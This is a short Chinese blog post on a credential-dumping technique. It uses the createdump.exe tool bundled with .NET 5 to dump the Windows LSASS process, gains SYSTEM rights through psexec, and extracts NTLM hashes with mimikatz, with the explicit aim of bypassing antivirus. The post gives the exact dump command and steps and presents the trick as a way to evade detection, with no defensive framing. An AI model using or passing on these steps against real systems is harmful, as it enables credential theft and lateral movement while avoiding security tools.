Dump lsass.exe 新思路

  • Dump lsass.exe 新思路已关闭评论
  • 68 views
  • A+

今天在twitter上发现一个dump lsass新思路。bypass av哦。

createdump.exe是.NET5 自带的工具。
.NET5 安装程序下载地址:.NET5 下载连接

安装后文件路径
language
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.0\createdump.exe

dump 命令:
language
createdump.exe -u -f xxx.dump pid

pid 为dump程序的pid值

需要system权限,管理员权限执行会报错。error 5

屏幕截图 20210302 150718.png
解决方法,psexec获取system权限。

屏幕截图 20210302 150932.png
然后就可以dump lsass进程了。

屏幕截图 20210302 151117.png
成功了,我们在用mimikatz读取就行。

QQ图片20210302151156.png

QQ图片20210302151207.png
我是指纹解锁,所以密码为null。但是获取到了ntlm值。
因为createdump.exe是微软自家的,所以你懂的!
参考:https://twitter.com/jas502n/status/1366604098980614144